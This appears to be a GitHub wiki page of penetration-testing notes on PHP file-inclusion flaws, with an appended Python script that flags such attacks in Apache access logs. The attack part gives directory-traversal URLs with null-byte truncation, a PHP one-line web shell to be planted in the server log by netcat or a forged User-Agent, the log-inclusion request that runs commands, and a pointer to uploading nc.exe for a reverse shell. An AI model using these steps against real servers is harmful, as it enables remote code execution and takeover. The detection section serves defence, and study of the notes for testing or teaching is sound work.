Web_LFI
lethanhtung01011980 edited this page Jan 2, 2020 · 3 revisions
- LFI/RFI vulnerabilities allow an attacker to include a remote or local file into the webserver’s running PHP code.
- "Include" vulnerability
To display content
- http://victim_ip/addguestbook.php?name=abc+2&comment=/&LANG=/../../../../../../windows/system32/drivers/etc/hosts%00&Submit=Submit
- http://victim_ip/addguestbook.php?name=abc+2&comment=/&LANG=/windows/system32/drivers/etc/hosts%00&Submit=Submit
Make log file to contain PHP code
- In attacker IP,
  nc -nv victim_ip 80
- Key in ONCE ONLY!!! and press ENTER a few times:
  <?php echo shell_exec($_GET['cmd']);?>
- Can use Burp to manipulate User-agent to poison log => User-agent:
  <?php echo(exec($_GET['cmd'])); ?>
  http://victim_ip/addguestbook.php?name=abc&comment=b&cmd=ipconfig&LANG=../../../../../../../xampp/apache/logs/access.log%00
- Can replace cmd with those in "File transfer" to upload nc.exe and create reverse shell.
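Seen from the defending side, each step above leaves a trace in the same access log. The following is an added detection example, not part of the original wiki page: it assumes Apache's "combined" log format, and the sample lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache "combined" format; only the quoted request and User-Agent are inspected.
LINE_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[[^\]]*\] "(?P<request>.*?)" '
                     r'(?P<status>\d{3}) \S+(?: "(?P<referer>.*?)" "(?P<agent>.*?)")?$')
PHP_TAG = re.compile(r'<\?(?:php|=)', re.I)                # PHP open tag stored in the log
TRAVERSAL = re.compile(r'\.\.[/\\]')                       # ../ or ..\
LOG_TARGET = re.compile(r'(?:access|error)[._]log', re.I)  # parameter pointing at a server log

# Constructed sample lines (documentation IP ranges, placeholder PHP body).
SAMPLE_LOG = [
    r'203.0.113.5 - - [02/Jan/2020:10:00:00 +0000] "GET /addguestbook.php?name=abc&comment=hi&LANG=en&Submit=Submit HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    r'198.51.100.7 - - [02/Jan/2020:10:01:00 +0000] "GET /addguestbook.php?name=abc+2&comment=/&LANG=/../../../../../../windows/system32/drivers/etc/hosts%00&Submit=Submit HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    r'198.51.100.7 - - [02/Jan/2020:10:02:00 +0000] "<?php /* constructed placeholder */ ?>" 400 226 "-" "-"',
    r'198.51.100.7 - - [02/Jan/2020:10:03:00 +0000] "GET / HTTP/1.1" 200 100 "-" "<?php /* constructed placeholder */ ?>"',
    r'198.51.100.7 - - [02/Jan/2020:10:04:00 +0000] "GET /addguestbook.php?name=abc&comment=b&LANG=../../../../../../../xampp/apache/logs/access.log%00 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


def decode(value, rounds=2):
    """Percent-decode up to `rounds` times so double-encoded input is still seen."""
    for _ in range(rounds):
        value = unquote(value)
    return value


def classify(line):
    """Return the sorted list of findings for one access-log line."""
    m = LINE_RE.match(line)
    if not m:
        return ["unparsed"]
    findings = set()
    if PHP_TAG.search(m["request"]) or PHP_TAG.search(m["agent"] or ""):
        findings.add("php-code-in-log")      # log poisoning via request line or User-Agent
    query = decode(m["request"].partition("?")[2])
    if TRAVERSAL.search(query):
        findings.add("traversal")
    if "\x00" in query:
        findings.add("null-byte")            # %00 used to cut off an appended suffix
    if LOG_TARGET.search(query):
        findings.add("log-file-include")     # a parameter resolves to a server log file
    return sorted(findings)


def scan(lines):
    """Map 1-based line numbers to findings, skipping clean lines."""
    return {n: f for n, line in enumerate(lines, 1) if (f := classify(line))}
```

A `php-code-in-log` hit followed by a `log-file-include` hit from the same host is the sequence to alert on; either finding alone is already worth triage.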